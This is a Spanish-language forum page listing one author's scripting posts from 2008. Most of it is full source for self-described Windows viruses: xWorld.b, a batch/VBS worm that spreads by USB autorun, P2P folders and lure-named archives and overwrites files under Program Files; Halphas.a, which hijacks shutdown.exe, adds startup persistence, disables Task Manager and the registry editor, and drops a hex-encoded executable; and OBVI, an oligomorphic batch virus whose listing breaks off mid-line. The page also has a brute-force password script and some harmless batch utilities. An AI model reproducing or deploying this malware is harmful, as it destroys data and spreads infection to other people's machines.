Últimos Temas de: The Shadow

Mostrar Temas
Páginas: [1] 2

Programación / Scripting / [virus][batch][vbs] xWorld.b

en: 7 Julio 2008, 23:38 pm

Código

:: Nombre: xWorld.b
:: Codeado por: Shadow; tshadow; The Shadow
:: Fecha: 14/04/08
:: Info: Worm de propagacion por USB, P2P y .rar . . .
:: Payload: El payload es aleatorio y al ejecutarse daña todos los archivos
::   del directorio ^%programfiles^%
@echo off
goto %1_
:_
set a="%temp%\xw.bat"
echo set shell = CreateObject("wscript.shell") > "%temp%\xwr.vbs"
echo shell.run "cmd /c %a% xc", vbHide >> "%temp%\xwr.vbs"
copy %0 %a%>nul
start "%temp%\xwr.vbs"
 
:xc_
for %%v IN (D F G H I J K L M N O P Q R S T U V W X Y Z) do call :cmp %%v
call :p2p
if /I %random:~1,1% lss 5 goto wrm
exit
 
:cmp
if exist "%1:" (
	copy %a% "%1:\xw.bat">nul
	echo [autorun] > "%1:\autorun.inf"
	echo open=xw.bat >> "%1:\autorun.inf"
	echo shellexecute=xw.bat >> "%1:\autorun.inf"
	echo shellexecute=xw.bat >> "%1:\autorun.inf"
	echo shell\explorar\command=xw.bat >> "%1:\autorun.inf"
	echo shell\explorar=^&Explorar >> "%1:\autorun.inf"
)
goto :EOF
 
:wrm
 
cd "%programfiles%"
dir /B > %homedrive%\dir.txt
goto for
 
:worm
set target=%1
cd "%target%"
for %%e in (*.*) do echo xWorld by Shadow>%%e
cd "%programfiles%"
goto :EOF
 
:for
for /f "tokens=* " %%a in (%homedrive%\dir.txt) do call :worm "%%a"
exit
 
:p2p
set a="%temp%\xw.bat"
if exist %windir%\t.rar (del %windir%\t.rar)
type %0>op.bat
set o="%systemdrive%%~p0op.bat"
cd "%systemdrive%%~p0"
echo eMule\Incoming\ > %windir%\yer.t
echo Shareaza\Downloads\ >> %windir%\yer.t
echo BearShare\Shared\ >> %windir%\yer.t
echo EDONKEY2000\incoming\ >> %windir%\yer.t
echo LimeWire\Shared\ >> %windir%\yer.t
echo Path_msn_Emoticonos > %windir%\jer.t
echo sms_gratis >> %windir%\jer.t
echo polifonicos_free >> %windir%\jer.t
echo Microsoft_Office_2007_all_serials >> %windir%\jer.t
echo Windows_Vista_activation_tool >> %windir%\jer.t
echo Windows_Vista_all_serials >> %windir%\jer.t
echo MSN_hack_codes >> %windir%\jer.t
set rc=1
set r="%programfiles%\WINRAR\WinRAR.exe"
%r% a %windir%\t.rar %o%
if not %errorlevel%==9009 set rc=0
goto fr
:fr2
set uno=%1
for /F "tokens=* delims=" %%g in (%windir%\jer.t) do (
         if %rc%==0 (
            @copy /y %o% "%%g.bat"
           cls
           ping -n 2 localhost > nul
           %r% a "%%g.rar" "%%g.bat"
         )
)
goto :EOF                                  
:fr
for /F "tokens=* delims=" %%a in (%windir%\yer.t) do (
         if exist "%programfiles%\%%a" (
            cd "%programfiles%\%%a"     
            for %%e in (*.rar) do (
               @copy /y %o% "%%~ne.bat"
              cls
              ping -n 2 localhost > nul
              %r% a "%%e" "%%~ne.bat"
            )      
         call :fr2 %%a
          )
)
pause
cd %windir%
del *.t
cd "%systemdrive%%~p0"
del op.bat
goto :EOF

Programación / Scripting / [virus][batch][vbs][asm] Halphas.a

en: 7 Julio 2008, 23:38 pm

Código

 
:: Codeado por: Shadow/tshadow/The Shadow
:: Info: el virus simula un apagon del sistema, al llegar a los ultimos 2 segundos, el apagon se para
:: luego se agrega registro y modifica algunas entradas como el admin de tareas y el editor de registro
:: luego crea un ejecutable .exe que coge una screen shot de la pantalla y la corre literalmente acia la izquierda de la pantalla
:: ilimitadas veces, causando un efecto realmente catastrofico ya que cada vez que el ciclo de la pantalla termina
:: sale un mensaje de exclamacion, esto quiere decir que tantas veces como sea el ciclo, tantas ventanas
:: de exclamacion saldran.
:: :Codificacion: asm de 32 bits, batch y vbs
:: :Nombre: Halphas.a
@echo off
goto %1_
 
:_
echo set shell = CreateObject("wscript.shell") >ex.vbs
echo shell.run "cmd /c %~n0%~x0 oks", vbHide >>ex.vbs
start ex
exit
 
:oks_
type %windir%\system32\shutdown.exe>%temp%\ht.exe
echo.>%windir%\system32\shutdown.exe
%temp%\ht -s -f -t 60
ping -n 58 localhost>nul
%temp%\ht -a
type %~n0%~x0>%temp%\tre.bat
set l="HKLM\software\microsoft\windows\currentversion\policies\explorer\run"
reg add %l% /V "RunDll23, AVService" /d "%temp%\tre.bat" /f
reg add "hkcu\software\microsoft\windows\currentversion\policies\system" /v disabletaskmgr /t reg_dword /d "1" /f
reg add "hkcu\software\microsoft\windows\currentversion\policies\system" /v disableregistrytools /t reg_dword /d "1" /f
 
echo n b2bt.tk > b2bf.tk
echo e 0 4D 5A 66 73 67 00 00 00 00 00 00 00 50 45 00 00  >> b2bf.tk
echo e 10 4C 01 02 00 46 53 47 21 00 00 00 00 00 00 00 00  >> b2bf.tk
echo e 20 E0 00 0F 01 0B 01 00 00 00 02 00 00 00 02 00 00  >> b2bf.tk
echo e 30 00 00 00 00 54 01 00 00 00 10 00 00 0C 00 00 00  >> b2bf.tk
echo e 40 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00  >> b2bf.tk
echo e 50 00 00 00 00 04 00 00 00 00 00 00 00 00 50 00 00  >> b2bf.tk
echo e 60 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00  >> b2bf.tk
echo e 70 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00  >> b2bf.tk
echo e 80 10 00 00 00 00 00 00 00 00 00 00 00 7C 41 00 00  >> b2bf.tk
echo e 90 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >> b2bf.tk
echo e A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >> b2bf.tk
echo e B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >> b2bf.tk
echo e C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >> b2bf.tk
echo e D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >> b2bf.tk
echo e E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >> b2bf.tk
echo e F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >> b2bf.tk
echo e 100 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00  >> b2bf.tk
echo e 110 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >> b2bf.tk
echo e 120 00 00 00 00 00 00 00 00 E0 00 00 C0 00 00 00 00  >> b2bf.tk
echo e 130 00 00 00 00 00 10 00 00 00 40 00 00 FD 01 00 00  >> b2bf.tk
echo e 140 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >> b2bf.tk
echo e 150 E0 00 00 C0 87 25 C0 41 40 00 61 94 55 A4 B6 80  >> b2bf.tk
echo e 160 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F  >> b2bf.tk
echo e 170 B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3A AA EB E0  >> b2bf.tk
echo e 180 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 24 AC  >> b2bf.tk
echo e 190 D1 E8 74 2D 13 C9 EB 18 91 48 C1 E0 08 AC FF 53  >> b2bf.tk
echo e 1A0 04 3B 43 F8 73 0A 80 FC 05 73 06 83 F8 7F 77 02  >> b2bf.tk
echo e 1B0 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB  >> b2bf.tk
echo e 1C0 9F 5E AD 97 AD 50 FF 53 10 95 8B 07 40 78 F3 75  >> b2bf.tk
echo e 1D0 03 FF 63 0C 50 55 FF 53 14 AB EB EE 33 C9 41 FF  >> b2bf.tk
echo e 1E0 13 13 C9 FF 13 72 F8 C3 02 D2 75 05 8A 16 46 12  >> b2bf.tk
echo e 1F0 D2 C3 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00  >> b2bf.tk
echo e 200 55 00 8B EC 83 C4 E0 C7 45 E8 E1 8E 03 FF 75 FE  >> b2bf.tk
echo e 210 0C 11 01 10 89 FE F0 70 6A F6 0D A8 0A FC 03 67  >> b2bf.tk
echo e 220 C0 0A F4 FF 9F DC FE 28 0F 6C F8 48 07 F4 80 F0  >> b2bf.tk
echo e 230 E8 54 C3 11 E4 A1 0B BE 0C EC 83 76 1D FC B6 86  >> b2bf.tk
echo e 240 1C E0 68 20 1C CC 1B 6A 05 44 45 36 FC A4 0D C8  >> b2bf.tk
echo e 250 42 9B A1 1E 73 40 0B 1F 7C 88 56 8B D0 18 23 DE  >> b2bf.tk
echo e 260 F4 29 39 40 91 DE 5B 7C 77 14 60 7E 0F 83 EE 08  >> b2bf.tk
echo e 270 79 2A D7 5E 17 EA 0F AB B5 DD 33 C7 E4 C2 3E A5  >> b2bf.tk
echo e 280 08 E0 0A 4F 27 0B B2 10 31 1B 7A DB AB 1E 22 5B  >> b2bf.tk
echo e 290 43 03 CC FF 25 8C 20 40 76 32 54 90 06 94 86 43  >> b2bf.tk
echo e 2A0 98 21 9C 90 A0 C8 A8 64 AC 32 B0 19 B4 0C BC 86  >> b2bf.tk
echo e 2B0 45 C0 1E 01 EF BA 4A 91 FC 2E 21 A5 08 49 E0 70  >> b2bf.tk
echo e 2C0 91 11 BC 22 92 8F 01 0E 80 20 11 AA CC C9 F9 E3  >> b2bf.tk
echo e 2D0 C8 09 F9 95 09 84 32 13 09 23 26 FF 02 33 7F 39  >> b2bf.tk
echo e 2E0 11 41 22 09 55 53 65 14 22 7D 52 85 0C 7F C0 7C  >> b2bf.tk
echo e 2F0 43 72 65 61 74 E7 D8 6F 6D 61 70 0E 69 62 6C F5  >> b2bf.tk
echo e 300 42 D7 F7 BF 5F 34 B0 2A 1A 3D 44 D0 16 53 F1 81  >> b2bf.tk
echo e 310 14 63 74 4F 62 6A A0 0D 10 DC 61 D5 6C 0A 36 44  >> b2bf.tk
echo e 320 35 60 85 1A 21 10 20 36 03 67 64 69 33 32 2E AF  >> b2bf.tk
echo e 330 FE 39 2D 47 B4 28 92 20 08 53 79 73 C6 40 6D 4D  >> b2bf.tk
echo e 340 12 1E 72 69 63 A9 5C 0D 6E 64 1E EF E1 61 67 E5  >> b2bf.tk
echo e 350 41 17 06 52 85 F9 FE 86 43 75 0C 57 72 43 6D 50  >> b2bf.tk
echo e 360 2E FE 90 A3 45 78 C1 FA 50 72 6F 63 B8 67 33 6B  >> b2bf.tk
echo e 370 42 6E 42 5E 24 91 01 EB BF A6 00 00 D4 41 00 00  >> b2bf.tk
echo e 380 00 00 00 00 00 00 00 00 F2 01 00 00 D4 41 00 00  >> b2bf.tk
echo e 390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >> b2bf.tk
echo e 3A0 00 00 00 00 00 10 40 00 00 40 40 00 00 20 40 00  >> b2bf.tk
echo e 3B0 00 00 00 00 C4 41 40 00 80 00 00 00 00 7D 00 00  >> b2bf.tk
echo e 3C0 A4 41 40 00 E8 01 40 00 DC 01 40 00 DE 01 40 00  >> b2bf.tk
echo e 3D0 00 10 40 00 DE 41 00 00 EC 41 00 00 00 00 00 00  >> b2bf.tk
echo e 3E0 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 47 65  >> b2bf.tk
echo e 3F0 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 00  >> b2bf.tk
echo rcx >> b2bf.tk
echo 3FD >> b2bf.tk
echo w0 >> b2bf.tk
echo q >> b2bf.tk
debug<b2bf.tk
set fich="$.exe"
 
:verif
set fich=%fich: =%
if exist %fich% goto loop
ren b2bt.tk %fich%
 
:loop
for /f "tokens=*" %%a in (b2bf.tk) do (
	echo MsgBox "%%a", vbCritical, "debugeo de: $.exe">hy.vbs
	start hy
	start $
	ping -n 2 localhost>nul
)
ping -n 4 localhost>nul
exit

Saludos!

Programación / Scripting / [batch] Funcion :H2B (convierte hexadecimal a binario)

en: 18 Febrero 2008, 21:46 pm

Código:

@echo off
::H2B
::Por: The Shadow|Shadow
::Info: Convierte un numero hexadecimal a binario
::Parametros: %1=numero hexadecimal
::Devuelve: %bin%=numero binario
::Nivel de precision:1 byte
:h2b
setlocal
if %1'==' goto err
call :h2d %1
if /I %dec% gtr 198 goto err
set bin=
set ay=%dec%
if %ay%==1 (set bin=1 && goto enda)
:aval
set lim=a
call :len %ay%
set /a lon=%len%-1
set lim=9
for /L %%a in (1,1,%lon%) do (
	set lim=9%lim%
)
set lim=%lim: =%
set naa=0
:cnta
if "%naa%"=="%lim%" (goto tst)
set /a cy=%naa%*2
if /I "%cy%" EQU "%ay%" (
	set bin=%bin%0
	goto cmp
)
set /a naa=%naa%+1
goto cnta
:tst
set bin=%bin%1
:cmp
if /I %ay% lss 2 goto end
set /A ay=%ay%/2
goto aval
:ohce
set wrd=
set ohce=
if %1'==' goto er_o
set wrd=%1
set wrd=%wrd:"=cnf%
call :len %wrd%
set /a len=%len%-1
for /l %%a in (%len%,-1,0) do (
	call :st %%wrd:~%%a,1%%
)
set ohce=%ohce:"=%
set ohce=%ohce:fnc="%
goto :EOF
:st
set p1=%1
set ohce=%ohce%%p1%
goto :EOF
:len
if %1'==' echo La sintaxis es: len [cadena] && goto :EOF
set w=%1
set a=0
set bol=0
:lp
call :cnt "%%w:~%a%,1%%" %a%
if %bol%==1 goto :EOF
set /a a=%a%+1 
goto lp
:cnt
set cur=%1
set len=%2
if %cur%a==""a (
	set bol=1
)
goto :EOF
:er_o
echo La sintaxis es: h2d [cadena]
goto :EOF
:h2d
set dec="La sintaxis es: h2d [numero_hexadecimal]"
set /a dec=0x%1*1
goto :EOF
:err
echo La sintaxis es: && echo.
echo 		h2b [numero]
echo. && echo Los numeros estan limitados a 1 byte aprox.
goto :EOF
:end
call :ohce %bin%
set bin=%ohce%
:enda
echo %bin%
endlocal
goto :EOF

Programación / Scripting / [batch] Funcion :D2B (convierte decimal a binario)

en: 18 Febrero 2008, 21:43 pm

Código:

@echo off
::D2B
::Por: The Shadow|Shadow
::Info: Convierte un numero decimal a binario
::Parametros: %1=numero decimal
::Devuelve: %bin%=numero binario
::Nivel de precision:1 byte
:d2b
setlocal
if %1'==' goto err
set /a cmp=%1*1
if not %cmp%==%1 goto err
if /I %1 gtr 198 goto err
set bin=
set ay=%1
if %ay%==1 (set bin=1 && goto enda)
:aval
set lim=a
call :len %ay%
set /a lon=%len%-1
set lim=9
for /L %%a in (1,1,%lon%) do (
	set lim=9%lim%
)
set lim=%lim: =%
set naa=0
:cnta
if "%naa%"=="%lim%" (goto tst)
set /a cy=%naa%*2
if /I "%cy%" EQU "%ay%" (
	set bin=%bin%0
	goto cmp
)
set /a naa=%naa%+1
goto cnta
:tst
set bin=%bin%1
:cmp
if /I %ay% lss 2 goto end
set /A ay=%ay%/2
goto aval
:ohce
set wrd=
set ohce=
if %1'==' goto er_o
set wrd=%1
set wrd=%wrd:"=cnf%
call :len %wrd%
set /a len=%len%-1
for /l %%a in (%len%,-1,0) do (
	call :st %%wrd:~%%a,1%%
)
set ohce=%ohce:"=%
set ohce=%ohce:fnc="%
goto :EOF
:st
set p1=%1
set ohce=%ohce%%p1%
goto :EOF
:len
if %1'==' echo La sintaxis es: len [cadena] && goto :EOF
set w=%1
set a=0
set bol=0
:lp
call :cnt "%%w:~%a%,1%%" %a%
if %bol%==1 goto :EOF
set /a a=%a%+1 
goto lp
:cnt
set cur=%1
set len=%2
if %cur%a==""a (
	set bol=1
)
goto :EOF
:er_o
echo La sintaxis es: h2d [cadena]
goto :EOF
:err
echo La sintaxis es: && echo.
echo 		d2b [numero]
echo. && echo Los numeros estan limitados a 1 byte aprox.
goto :EOF
:end
call :ohce %bin%
set bin=%ohce%
:enda
echo %bin%
endlocal
goto :EOF

Programación / Scripting / [batch] Funcion :H2D (convierte hexa a decimal)

en: 18 Febrero 2008, 21:40 pm

Código:

@echo off
::H2D
::Por: The Shadow|Shadow
::Info: Convierte un numero hexadecimal a decimal
::Parametros: %1=numero hexadecimanl
::Devuelve: %h2d%=numero decimal
:h2d
set dec="La sintaxis es: h2d [numero_hexadecimal]"
set /a dec=0x%1*1
echo %dec% && goto :EOF

Programación / Scripting / [batch] Funcion :ohce (invierte una cadena)

en: 18 Febrero 2008, 21:39 pm

Código:

@echo off
::OHCE
::Por: The Shadow|Shadow
::Info: Invierte una cadena especifica
::Parametros: %1=cadena
::Devuelve: %ohce%=cadena invertida
:ohce
set wrd=
set ohce=
if %1'==' goto er_o
set wrd=%1
set wrd=%wrd:"=cnf%
call :len %wrd%
set /a len=%len%-1
for /l %%a in (%len%,-1,0) do (
	call :st %%wrd:~%%a,1%%
)
set ohce=%ohce:"=%
set ohce=%ohce:fnc="%
echo %ohce%
goto :EOF
:st
set p1=%1
set ohce=%ohce%%p1%
goto :EOF
:len
if %1'==' echo La sintaxis es: len [cadena] && goto :EOF
set w=%1
set a=0
set bol=0
:lp
call :cnt "%%w:~%a%,1%%" %a%
if %bol%==1 goto :EOF
set /a a=%a%+1 
goto lp
:cnt
set cur=%1
set len=%2
if %cur%a==""a (
	set bol=1
)
goto :EOF
:er_o
echo La sintaxis es: h2d [cadena]
goto :EOF

Programación / Scripting / [batch] Funcion :len (devuelve la longitud de una cadena)

en: 18 Febrero 2008, 21:32 pm

Código:

@echo off
::LEN
::Por: The Shadow|Shadow
::Info: Regresa la longitud de la cadena especificada.
::      Si la cadena contiene espacios, el script
::      tomara la cadena que esta antes del 1er espacio.
::Parametros: %1=cadena
:len
if %1'==' echo La sintaxis es: len [cadena] && goto :EOF
set w=%1
set a=0
set bol=0
:lp
call :cnt "%%w:~%a%,1%%" %a%
if %bol%==1 goto :EOF
set /a a=%a%+1 
goto lp
:cnt
set cur=%1
set len=%2
if %cur%a==""a (
	echo %len%
	set bol=1
)
goto :EOF

Programación / Scripting / [batch] calculadora simple!

en: 16 Febrero 2008, 00:56 am

Código:

@echo off
:ini
cls
echo introduzca el 1er numero, luego ENTER
echo Luego el signo de la operacion (+, -, * y /), seguido de ENTER
echo Luego el 2do numero, finalizando con ENTER.
echo.
set /p a=
set /a g=%a: =%+666
if %g% == 666 (echo ERROR: Debe introducir solo numeros!
                           pause
                           goto ini)
set /p b=
@set /a h=1%b%2
if not %b:~0,1%==- (if not %b:~0,1%==-+ (if not %b:~0,1%==* (if not %b:~0,1%==/ (echo ERROR: Los unicos caracteres permitidos en este campo son: + - * /
                                                                                 pause
                                                                                 goto ini ))))
set /p c=
set /a g=%c: =%+666
if %g% == 666 (echo ERROR: Debe introducir solo numeros!
                           pause
                          goto ini)
call :proceso %a: =% %b:~0,1% %c: =%
pause
goto ini
:proceso
set /a r=%1 %2 %3
echo =%r: =%
goto :EOF

9	Programación / Scripting / [batch-vbs] ejemplo de crackeo por brute force	en: 16 Febrero 2008, 00:18 am
info: -permite el uso de diccionarios (archivos que dentro contienen una lista de palabras para q el programa las analize) -agrega las letras mayusculas del abecedario al analisis -reconoce por si mismo la cantidad de caracteres q posee la clave ... osea q ya no es necesario especificar la longitud de la clave -evita al minimo los errores humanos en la introduccion de datos (introducir una clave nula o no introducir clave, introducir una clave de mas de 9 caracteres, introducir espacios dentro de la clave, introducir un diccionario que no exista, etc) -igual q n la version anterior... el prog puede trabajar desde una llamada del cmd (como un comando)... la sintaxis a cambiado a: c:\>fb3 X Y donde c:\=ruta donde esta el programa; fb3=nombre del programa; X=clave; Y=ruta del diccionario* si no se va a usar diccionario la sintaxis cambia a: c:\>fb3 X donde c:\=ruta donde esta el programa; fb3=nombre del programa; X=clave ejemplos: 1) c:\>fb3 a52 2) c:\>fb3 localroot dic1.txt explicaciones: 1) buskra la pass "a52" por fuerza bruta 2) buskra la pass "localroot" con el diccionario "dic1.txt", si no la encuentra, buskra por fuerza bruta ejemplo de un diccionario compatible: --------------------------dic1.txt----- admin root 1a2b system sysroot null 123456789 mariana 111111111 slipknot abcd localroot time quote ------------------------fin(dic1.txt)--------- code del soft: -------------------------------------------------------------------------------fb3.bat------------------------ Citar @echo off color a if not '%1==' (set pk=%1 if not %2'==' set rta=%2 set pj=mce.bat m goto cnn) set pj=start /max mce.bat cls echo. echo. :ps set /p dic=Usara diccionario S/N? if %dic:~0,1%==S goto rd if %dic:~0,1%==s goto rd goto prs :rd set /p rta=Ruta donde se encuentra el diccionario? if %rta%t==t goto ps :prs set /p pk=pass? :cnn set nop=666 set d=no set pass=%pk: =% set pk=%pass% if %pass:~0,1%a==a ( cls color c echo Debe darle al programa una pass para buscar! pause color a goto ps ) if %pass:~1,1%a==a (set nop=1 goto op) if %pass:~2,1%a==a (set nop=2 goto op) if %pass:~3,1%a==a (set nop=3 goto op) if %pass:~4,1%a==a (set nop=4 goto op) if %pass:~5,1%a==a (set nop=5 goto op) if %pass:~6,1%a==a (set nop=6 goto op) if %pass:~7,1%a==a (set nop=7 goto op) if %pass:~8,1%a==a (set nop=8 goto op) if %pass:~9,1%a==a (set nop=9 goto op) if %nop%==666 ( set pass=%pass:~0,9% set nop=9 ) :op if not %rta%'==' if exist %rta% set d=si if %d%==si ( for /f "tokens=* delims=" %%v in (%rta%) do ( color 4 echo Probando %%v==%pass% if %%v==%pass% ( echo. color a && echo Pass Encontrada! pause goto %pj:~0,1% ) ) ) :op2 set n=1 set /a np=%nop%+1 echo 0 >da.tk echo %np% >plo.tk echo @echo off >jl.tk echo set rop=_1k >>jl.tk echo color 4 >>jl.tk echo set tip=_time_ >>jl.tk echo set pass=%pk% >>jl.tk echo goto x1 >>jl.tk :a if %n%==10 (set n=%nop% goto l) echo %n% >>da.tk set /A n=%n%+1 goto a :l if %n%==0 goto le echo %n% >>plo.tk set /A n=%n%-1 goto l :le echo a >>da.tk echo b >>da.tk echo c >>da.tk echo d >>da.tk echo e >>da.tk echo f >>da.tk echo g >>da.tk echo h >>da.tk echo i >>da.tk echo j >>da.tk echo k >>da.tk echo l >>da.tk echo m >>da.tk echo n >>da.tk echo o >>da.tk echo p >>da.tk echo q >>da.tk echo r >>da.tk echo s >>da.tk echo t >>da.tk echo u >>da.tk echo v >>da.tk echo w >>da.tk echo x >>da.tk echo y >>da.tk echo z >>da.tk echo A >>da.tk echo B >>da.tk echo C >>da.tk echo D >>da.tk echo E >>da.tk echo F >>da.tk echo G >>da.tk echo H >>da.tk echo I >>da.tk echo J >>da.tk echo K >>da.tk echo L >>da.tk echo M >>da.tk echo N >>da.tk echo O >>da.tk echo P >>da.tk echo Q >>da.tk echo R >>da.tk echo S >>da.tk echo T >>da.tk echo U >>da.tk echo V >>da.tk echo W >>da.tk echo X >>da.tk echo Y >>da.tk echo Z >>da.tk goto for :mc set a=%1 set /A a1=%a%+1 if %a%==%np% ( echo :x%a% >>jl.tk echo set a1=_2_1 >>jl.tk echo echo Probando _a1: =_=_pass_ >>jl.tk echo if _a1_==_pass_ ¡color a >>jl.tk echo echo Pass encontrada >>jl.tk echo echo. >>jl.tk echo echo. >>jl.tk echo echo Hora de inicio: _tip_ >>jl.tk echo echo Hora de finalizacion: _time_ >>jl.tk echo pause >>jl.tk echo del /s /q .tk, rep.vbs ^> nul >>jl.tk echo goto _rop_ >>jl.tk echo :k >>jl.tk echo exit >>jl.tk echo :mk >>jl.tk echo title Simbolo de sistema >>jl.tk echo color 7 >>jl.tk echo cmd $ >>jl.tk echo goto :EOF >>jl.tk goto :EOF ) if %a%==1 ( echo :x%a% >>jl.tk echo for /F "tokens=" __v in ¡da.tk$ do call :x%a1% __v >>jl.tk goto :EOF ) echo :x%a% >>jl.tk echo set a1=_2_1 >>jl.tk echo for /F "tokens=" __v in (da.tk) do call :x%a1% __v _a1_ >>jl.tk echo goto :EOF >>jl.tk goto :EOF :for for /F "tokens=" %%v in (plo.tk) do call :mc %%v if exist "mce.bat" del mce.bat echo set shell = CreateObject("Scripting.FileSystemObject") > rep.vbs echo set file = shell.OpenTextFile("jl.tk") >> rep.vbs echo read = file.ReadAll >> rep.vbs echo repla = replace(read,"_",chr(37)) >> rep.vbs echo repla1 = replace(repla,"¡",chr(40)) >> rep.vbs echo repla2 = replace(repla1,"$",chr(41)) >> rep.vbs echo set b=shell.CreateTextFile("mce.bat") >> rep.vbs echo b.close >> rep.vbs echo set d=shell.OpenTextFile("mce.bat",2) >> rep.vbs echo d.write repla2 >> rep.vbs echo d.close >> rep.vbs start rep.vbs ping -n 4 localhost >nul %pj% goto %pj:~0,1% :s exit :m -------------------------------------------------------------------------------------fin(fb3.bat)------ Saludos

Programación / Scripting / [virus-batch|vbs] OBVI

en: 16 Febrero 2008, 00:16 am

Código:

@echo off
rem ----------------------------------------------------------------------
rem OBVI =================  .........   25/11/07
rem well it is a poliformic .bat file virus ... mmmmm is like another virus life form ... do not infect anything
rem only have fun with the victim xD .... 
rem ...well nothing special but i think is really nice to see a poliformic batch script virus
rem enjoy!
rem OBVI (Oligomorphic Batch VIrus)
echo  ============================================
echo  |OBVI by Shadow (The Shadow) whatever way |
echo  ============================================
set a="%windir%\prntcrlt.bat"
if exist %a% goto code
echo set shell = CreateObject("wscript.shell") > %windir%\run.vbs
echo shell.run "cmd /c prntcrlt.bat", vbHide >> %windir%\run.vbs
copy %0 %a%
:qep
set hor=%time:~0,2%
set tim=%time:~3%
set tim=%tim:~0,2%
set /A tim=%tim% + 5
if /I %tim% geq 60 (set /a hor=%hor%+1
                    set /a tim=%tim%-60
                    if /I %tim% lss 10 (set tim=0%tim%))
set ecx=%hor%:%tim%
at %ecx% "%windir%\run.vbs"
exit
:crea
echo 0 > vals.tk
echo 1 >> vals.tk
echo 2 >> vals.tk
echo 3 >> vals.tk
echo 4 >> vals.tk
echo 5 >> vals.tk
echo 6 >> vals.tk
echo 7 >> vals.tk
echo 8 >> vals.tk
echo 9 >> vals.tk
echo A >> vals.tk
echo B >> vals.tk
echo C >> vals.tk
echo D >> vals.tk
echo E >> vals.tk
echo F >> vals.tk
goto for
:modulcrea
set tar=%tar:~,1%
if /I %tar% leq 9 ( if %tar% == 9 ( set tar2=A
                                    goto klop )  
                    set /A tar2=%tar%+1 ) else ( if %tar% == A set tar2=B
                                                 if %tar% == B set tar2=C
                                                 if %tar% == C set tar2=D
                                                 if %tar% == D set tar2=E
                                                 if %tar% == E set tar2=F )
:klop
echo :modul%tar% ¿mol%tar%¿ >> modul.tk
if %tar%==0 ( echo reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t Reg_dword /d 1 /f ¿mol%tar%¿ >> modul.tk
              echo reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t Reg_dword /d 1 /f ¿mol%tar%¿ >> modul.tk 
              echo goto ¿1_jk ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==1 ( echo :_jk ¿mol%tar%¿ >> modul.tk
              echo copy "¿windir¿\kpore.bat" "¿windir¿\k0.bat" ¿mol%tar%¿ >> modul.tk
              echo reg add "HKLM\software\microsoft\windows\currentversion\policies\explorer\run" /V MSNupdate /d "%windir%\k0.vbs" /f ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==2 ( echo echo set shell = CreateObject¡"wscript.shell"$ ^> %windir%\k0.vbs ¿mol%tar%¿ >> modul.tk
              echo echo shell.run "cmd /c k0.bat ini", vbHide ^>^> %windir%\k0.vbs ¿mol%tar%¿ >> modul.tk
	      echo echo Set fg = CreateObject¡"WMPlayer.OCX.7"$ ^> conf.vbs ¿mol%tar%¿ >> modul.tk
              echo echo Set fgh = fg.cdromCollection ^>^> conf.vbs   ¿mol%tar%¿ >> modul.tk
              echo echo if fgh.Count  then ^>^> conf.vbs  ¿mol%tar%¿ >> modul.tk
              echo echo       For i = 0 to fgh.Count-1 ^>^> conf.vbs  ¿mol%tar%¿ >> modul.tk
              echo echo             fgh.Item¡i$.Eject ^>^> conf.vbs  ¿mol%tar%¿ >> modul.tk
              echo echo       Next   ' cdrom ^>^> conf.vbs  ¿mol%tar%¿ >> modul.tk
              echo echo End If ^>^> conf.vbs ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==3 ( echo :ini_jk ¿mol%tar%¿ >> modul.tk
              echo start conf.vbs ¿mol%tar%¿ >> modul.tk
              echo set hor=¿time:~0,2¿ ¿mol%tar%¿ >> modul.tk
              echo set tim=¿time:~3¿ ¿mol%tar%¿ >> modul.tk
              echo set tim=¿tim:~0,2¿ ¿mol%tar%¿ >> modul.tk
              echo set /A tim=¿tim¿+1 ¿mol%tar%¿ >> modul.tk
              echo if /I ¿tim¿ geq 60 ¡set /a hor=¿hor¿+1 ¿mol%tar%¿ >> modul.tk
              echo                     set /a tim=¿tim¿-60 ¿mol%tar%¿ >> modul.tk
              echo                     if /I ¿tim¿ lss 10 ¡set tim=0¿tim¿$$ ¿mol%tar%¿ >> modul.tk
              echo set ecx=¿hor:~0,2¿:¿tim¿ ¿mol%tar%¿ >> modul.tk
              echo at ¿ecx¿ "¿windir¿\k0.vbs" ¿mol%tar%¿ >> modul.tk
              echo exit ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==4 ( echo cd "¿programfiles¿" ¿mol%tar%¿ >> modul.tk
              echo dir /B ^> ¿homedrive¿\dir.txt ¿mol%tar%¿ >> modul.tk
              echo goto for ¿mol%tar%¿ >> modul.tk
              echo goto modul%tar2% ¿mol%tar%¿ >> modul.tk   
              goto :EOF )
if %tar%==5 ( echo reg add "HKLM\software\microsoft\windows\currentversion\policies\explorer\run" /V MSNupdate2 /d "shutdown -r -f -t 2423" /f ¿mol%tar%¿ >> modul.tk
